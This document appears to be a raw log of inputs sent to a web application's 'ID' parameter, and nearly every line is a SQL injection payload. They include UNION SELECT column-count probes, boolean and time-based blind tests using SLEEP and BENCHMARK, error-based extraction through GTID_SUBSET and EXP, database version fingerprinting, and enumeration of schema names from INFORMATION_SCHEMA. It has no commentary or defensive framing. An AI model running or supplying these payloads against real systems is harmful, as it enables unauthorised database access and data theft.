ID:-8160' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3450' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-5253' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-6640' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2357' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1213' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9026' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3527' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7467' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2717' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7104' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-4882' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-6798' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1274' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-8271' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9794' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-9927' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-3534' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-2356' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-1818' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7514' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:-7148' UNION ALL SELECT 76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76,76#
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (CASE WHEN (2047=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2047) THEN 1 ELSE 0 END)),0x71627a7071),3170) AND 'Tkmg'='Tkmg
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT REPEAT(0x34,1024)),0x71627a7071),9804) AND 'tsxA'='tsxA
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT REPEAT(0x30,190)),0x71627a7071),1433) AND 'udeM'='udeM
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x71627a7071),7886) AND 'WNNo'='WNNo
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x71627a7071),4737) AND 'apMu'='apMu
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x71627a7071),2123) AND 'aquV'='aquV
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x71627a7071),1681) AND 'eNjD'='eNjD
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x71627a7071),7232) AND 'Aeuq'='Aeuq
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7071),6242) AND 'gOZa'='gOZa
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x71627a7071),4868) AND 'xUDg'='xUDg
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x71627a7071),8591) AND 'LlYm'='LlYm
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x71627a7071),5414) AND 'fKRO'='fKRO
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x71627a7071),1990) AND 'swdr'='swdr
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x71627a7071),5885) AND 'dYxk'='dYxk
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x71627a7071),7912) AND 'MpPk'='MpPk
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),0x71627a7071),9305) AND 'OKNx'='OKNx
ID:1' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),0x71627a7071),4771) AND 'RemU'='RemU
ID:1
ID:1'
ID:1'
ID:1'nj
ID:1'order by 3
ID:1'order by 2
ID:1'order by 4
ID:1order by 4
ID:1order by 56
ID:1
ID:1
ID:2
ID:1
ID:1 and 1=2
ID:1'
ID:1' -- 
ID:-1'  -- 
ID:-1' union select 1,2,database() -- 
ID:-1' union select 1,2,database() -- 
ID:1'
ID:1' and sleep(5) -- 
ID:1
ID:1
ID:1
ID:1
ID:3123
ID:1)((".(')).
ID:1'HPxJHi<'">GZPmQs
ID:1) AND 1871=8331 AND (8443=8443
ID:1) AND 2365=2365 AND (8713=8713
ID:1 AND 4749=6010
ID:1 AND 2365=2365
ID:1 AND 6858=2577-- FiMD
ID:1 AND 2365=2365-- QOpQ
ID:1') AND 4123=6385 AND ('iSys'='iSys
ID:1') AND 2365=2365 AND ('EcNc'='EcNc
ID:1' AND 6788=1123 AND 'VyRH'='VyRH
ID:1' AND 2365=2365 AND 'MBsE'='MBsE
ID:1' AND 9794=8196 AND 'nTwt'='nTwt
ID:(SELECT CONCAT(CONCAT(0x7176766b71,(CASE WHEN (4437=4437) THEN 0x31 ELSE 0x30 END)),0x716a6b6a71))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176766b71,(SELECT (ELT(3545=3545,1))),0x716a6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'rSlM'='rSlM
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176766b71,(SELECT (ELT(5885=5885,1))),0x716a6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'IDKm'='IDKm
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176766b71,(SELECT (ELT(5557=5557,1))),0x716a6b6a71,0x78))x)) AND 'BNoP'='BNoP
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176766b71,(SELECT (ELT(3730=3730,1))),0x716a6b6a71,0x78))x)) AND 'Udkr'='Udkr
ID:1' AND GTID_SUBSET(CONCAT(0x7176766b71,(SELECT (ELT(2357=2357,1))),0x716a6b6a71),2357) AND 'BPKc'='BPKc
ID:(SELECT CONCAT(0x7176766b71,(ELT(4854=4854,1)),0x716a6b6a71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'btxo'='btxo
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))hzqN)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))VKiR) AND 'pKgW'='pKgW
ID:1';SELECT BENCHMARK(5000000,MD5(0x504d694b))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x504c5179)) AND 'wgzv'='wgzv
ID:1' AND (SELECT 2711 FROM (SELECT(SLEEP(5)))Hgch) AND 'QSCa'='QSCa
ID:1' AND (SELECT 2711 FROM (SELECT(SLEEP(0)))Hgch) AND 'QSCa'='QSCa
ID:1' AND (SELECT 2711 FROM (SELECT(SLEEP(5)))Hgch) AND 'QSCa'='QSCa
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 6139-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x446b6141547153566764444a716854736e4b6165536175696846625378575271644d6c624a564b6d,0x716a6b6a71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x49575a7252415259654c51456f6651666e694b4e486365495359476c62446774434b6272684d7750,0x716a6b6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x576b4f6668686c7963654c414f68687a666f42554444684a616b7277724e6354416572715654446d,0x716a6b6a71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x794e5a5862637a796a56,0x716a6b6a71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x57614e44526264564746,0x716a6b6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x4f614b43775246657a73,0x716a6b6a71),NULL,NULL-- -
ID:-1154' UNION ALL SELECT CONCAT(0x7176766b71,0x4b6c64454a6a5552764f4e6b735a4c5072514e6842744942616b6a73694f7a52516c414b71584b56,0x716a6b6a71),NULL,NULL-- -
ID:-6827' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x6e526f484741576f587972524d4176424c6d516759557659586d525047596f5a556657624a4b6655,0x716a6b6a71),NULL-- -
ID:-2817' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x41494b64704776735a6b4479616f494f63725961626759486e76584f535353736f4d4955754b5373,0x716a6b6a71)-- -
ID:-9120' UNION ALL SELECT CONCAT(0x7176766b71,0x4e4c6d5141434a544669,0x716a6b6a71),NULL,NULL-- -
ID:-2053' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x424a6a4c504c754b4543,0x716a6b6a71),NULL-- -
ID:-1773' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x4a6f4c4c6c587a6a7455,0x716a6b6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x595161644656747869634861444461566d535375627158476441626452726c507479447476587159,0x716a6b6a71),19,19-- -
ID:1' UNION ALL SELECT 19,CONCAT(0x7176766b71,0x6a6745574256786a665871534c5271596a4543676478764b706e6b474f445a7374736c516677636b,0x716a6b6a71),19-- -
ID:1' UNION ALL SELECT 19,19,CONCAT(0x7176766b71,0x62794d6c6a5174756846424e547a456f6c7972674779426348574a4467455155487941675253697a,0x716a6b6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x786b5a68634270467144,0x716a6b6a71),19,19-- -
ID:1' UNION ALL SELECT 19,CONCAT(0x7176766b71,0x4a4c4c544547454f5669,0x716a6b6a71),19-- -
ID:1' UNION ALL SELECT 19,19,CONCAT(0x7176766b71,0x78496542677474574d48,0x716a6b6a71)-- -
ID:-2630' UNION ALL SELECT 19,CONCAT(0x7176766b71,0x4e646350475a6641414473774d715956795250786d4b51614b557a53584852696370465744687076,0x716a6b6a71),19-- -
ID:-2319' UNION ALL SELECT 19,19,CONCAT(0x7176766b71,0x665956446a764772744f4a6472647a685459764c6d444b4859524d78414243735962726663626151,0x716a6b6a71)-- -
ID:-9897' UNION ALL SELECT CONCAT(0x7176766b71,0x42446b677250554a706d446e444956544a6146454c5649674451676d5867704c7167594461526d73,0x716a6b6a71),19,19-- -
ID:-1628' UNION ALL SELECT 19,CONCAT(0x7176766b71,0x6e4b574d6e4d5554516d,0x716a6b6a71),19-- -
ID:-1114' UNION ALL SELECT 19,19,CONCAT(0x7176766b71,0x594976507856556c4a76,0x716a6b6a71)-- -
ID:-9447' UNION ALL SELECT CONCAT(0x7176766b71,0x58665463716650644d52,0x716a6b6a71),19,19-- -
ID:1' UNION ALL SELECT NULL-- -
ID:1' UNION ALL SELECT NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x6166414a5a534b744f62516b4b7348424d6e5a6c4f554468507a6e496b646a574d534a555a516d57,0x716a6b6a71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x467044614569786c6b6d654563535858484768566d706e6b6a7755425a6856455373526d76635671,0x716a6b6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x4b495343615746744244497a674655425547744d48595875797a4e4f4b63747073654d6b634a7777,0x716a6b6a71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x635450596b66794c746a,0x716a6b6a71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x65424c4e436c53476c55,0x716a6b6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x5444717742704b544a75,0x716a6b6a71),NULL,NULL-- -
ID:-2798' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x414e566c4c4842555177586968534667584d536d7456554379566a516b54705876654a6873734b64,0x716a6b6a71),NULL-- -
ID:-3069' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x50585762776f485251464d544b69755670516271764b4d516273494f784f757263594e46626d4864,0x716a6b6a71)-- -
ID:-9425' UNION ALL SELECT CONCAT(0x7176766b71,0x79484a595843656971775345616c7441464d46515a4d504354416479627474676258797a644b434c,0x716a6b6a71),NULL,NULL-- -
ID:-2134' UNION ALL SELECT NULL,CONCAT(0x7176766b71,0x5161754654426f5a654a,0x716a6b6a71),NULL-- -
ID:-6331' UNION ALL SELECT NULL,NULL,CONCAT(0x7176766b71,0x6b535a746c734473514e,0x716a6b6a71)-- -
ID:-8791' UNION ALL SELECT CONCAT(0x7176766b71,0x45785a546f63594b556e,0x716a6b6a71),NULL,NULL-- -
ID:1' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x69704a5352556d4d477463486646726553525544466d48625a526d466e7274537a7a484b6c6e7148,0x716a6b6a71),32-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x6a7447464e657657437a644c6f655069524976686c6156656944516378614a434f5064654343464b,0x716a6b6a71),32,32-- -
ID:1' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x6c654c4d6943626f4a47687649616662685153496f476352414a4958754d595473667a4171445858,0x716a6b6a71)-- -
ID:1' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x6568416f72524b52646d,0x716a6b6a71),32-- -
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x504b6c424b654c516a52,0x716a6b6a71),32,32-- -
ID:1' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x4c545777507564715753,0x716a6b6a71)-- -
ID:-3216' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x7255727770654459624e544a5858736d4e4a4c6e6562714364574c706e726f686a6c43454b4f6c73,0x716a6b6a71)-- -
ID:-3044' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x6273634d765a6d474247577642616d70486e744a6b446f454f654e5757615257646a7555676e5048,0x716a6b6a71),32-- -
ID:-9096' UNION ALL SELECT CONCAT(0x7176766b71,0x526d6c50416c776b4d576e6a66476c79644d4a49696559494a48546c62617559645354594f755278,0x716a6b6a71),32,32-- -
ID:-1888' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x495952767463654b4a6a,0x716a6b6a71)-- -
ID:-8452' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x6c55514141697876595a,0x716a6b6a71),32-- -
ID:-1211' UNION ALL SELECT CONCAT(0x7176766b71,0x4f484a4e4d6d7867444b,0x716a6b6a71),32,32-- -
ID:-5326' UNION ALL SELECT 32#
ID:-1821' UNION ALL SELECT 32,32#
ID:-3130' UNION ALL SELECT 32,32,32#
ID:-8013' UNION ALL SELECT 32,32,32,32#
ID:-3058' UNION ALL SELECT 32,32,32,32,32#
ID:-6323' UNION ALL SELECT 32,32,32,32,32,32#
ID:-4450' UNION ALL SELECT 32,32,32,32,32,32,32#
ID:-5985' UNION ALL SELECT 32,32,32,32,32,32,32,32#
ID:-3562' UNION ALL SELECT 32,32,32,32,32,32,32,32,32#
ID:-5707' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32#
ID:-7079' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32#
ID:-7000' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7772' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2952' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7446' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-9034' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-9852' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-3269' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2445' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-5450' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:1' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x71774f437441564d5a6d4a59424359564a456349746d47427a56705254614642684c79464f724d52,0x716a6b6a71),32#
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x6c726f57674247424569764c76735773416d744d4a4465726a7a5570595961425467427078625948,0x716a6b6a71),32,32#
ID:1' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x59436454666f44754675714779797a4876574d6d4867676549646855534c514e756657656d7a6477,0x716a6b6a71)#
ID:1' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x67747947687744545946,0x716a6b6a71),32#
ID:1' UNION ALL SELECT CONCAT(0x7176766b71,0x65716c474d6665736f69,0x716a6b6a71),32,32#
ID:1' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x484c7a5346756a435148,0x716a6b6a71)#
ID:-6608' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x436e6d766d645a515a427649544f50436d566a4341514b76725553734b6c59465568794b77455949,0x716a6b6a71),32#
ID:-9305' UNION ALL SELECT CONCAT(0x7176766b71,0x7a7a534452416a497845616a63614a6271674b6c527177716473694558525974564c5a424164514d,0x716a6b6a71),32,32#
ID:-1790' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x6a54425a4d41496751556a747a756570646b526e79545441645364634864617a6c4e476e46706e62,0x716a6b6a71)#
ID:-5463' UNION ALL SELECT 32,CONCAT(0x7176766b71,0x4b586974527974526965,0x716a6b6a71),32#
ID:-9435' UNION ALL SELECT CONCAT(0x7176766b71,0x45694d72696554504673,0x716a6b6a71),32,32#
ID:-6902' UNION ALL SELECT 32,32,CONCAT(0x7176766b71,0x4b566352656954705a72,0x716a6b6a71)#
ID:-9822' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2242' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2289' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-7036' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-2915' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-6147' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
ID:-1893' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32#
